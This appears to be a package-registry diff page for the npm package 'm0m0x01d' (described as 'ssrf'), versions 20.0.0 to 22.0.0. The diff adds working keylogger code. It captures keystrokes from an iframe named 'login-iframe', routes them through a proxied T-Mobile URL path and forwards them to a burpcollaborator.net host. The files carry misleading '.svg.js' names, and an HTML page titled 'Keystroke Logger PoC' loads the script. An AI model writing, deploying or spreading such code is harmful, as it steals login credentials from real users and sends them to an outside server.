m0m0x01d 20.0.0 → 22.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (4) hide show
  1. package/iframe4.svg.html +1 -1
  2. package/intermediary.svg.js +11 -0
  3. package/keystroke-capture.svg.js +25 -0
  4. package/package.json +1 -1
package/iframe4.svg.html CHANGED
@@ -5,7 +5,7 @@
5
5
  <meta charset="UTF-8">
6
6
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
7
7
  <title>Keystroke Capture</title>
8
- <script src="https://unpkg.com/m0m0x01d@19.0.0/keystroke-capture.js"></script>
8
+ <script src="https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/keystroke-capture.svg.js"></script>
9
9
  </head>
10
10
  <body>
11
11
  <h1>Keystroke Logger PoC</h1>
package/intermediary.svg.js ADDED
@@ -0,0 +1,11 @@
1
+ // Intermediary script to forward keystrokes to your server
2
+ self.addEventListener('message', function(event) {
3
+ var data = event.data;
4
+
5
+ // Forward the keystrokes to your server
6
+ var xhr = new XMLHttpRequest();
7
+ xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
8
+ xhr.setRequestHeader("Content-Type", "application/json");
9
+ xhr.send(JSON.stringify({ keystrokes: data }));
10
+ });
11
+
package/keystroke-capture.svg.js ADDED
@@ -0,0 +1,25 @@
1
+ // Function to send keystrokes to the intermediary file on unpkg
2
+ function sendKeystrokes(data) {
3
+ var xhr = new XMLHttpRequest();
4
+ xhr.open("POST", "https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/intermediary.svg.js", true);
5
+ xhr.setRequestHeader("Content-Type", "application/json");
6
+ xhr.send(JSON.stringify({ keystrokes: data }));
7
+ }
8
+
9
+ // Function to capture keystrokes in the iframe
10
+ function captureKeystrokes() {
11
+ var iframe = document.getElementById('login-iframe').contentWindow;
12
+
13
+ // Listen for key presses in the iframe
14
+ iframe.document.onkeyup = function(event) {
15
+ sendKeystrokes(event.key); // Send each keystroke to the intermediary
16
+ };
17
+ }
18
+
19
+ // Wait for the iframe to load, then start capturing keystrokes
20
+ window.onload = function() {
21
+ var iframe = document.getElementById('login-iframe');
22
+ iframe.onload = function() {
23
+ captureKeystrokes();
24
+ };
25
+ };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "20.0.0",
3
+ "version": "22.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {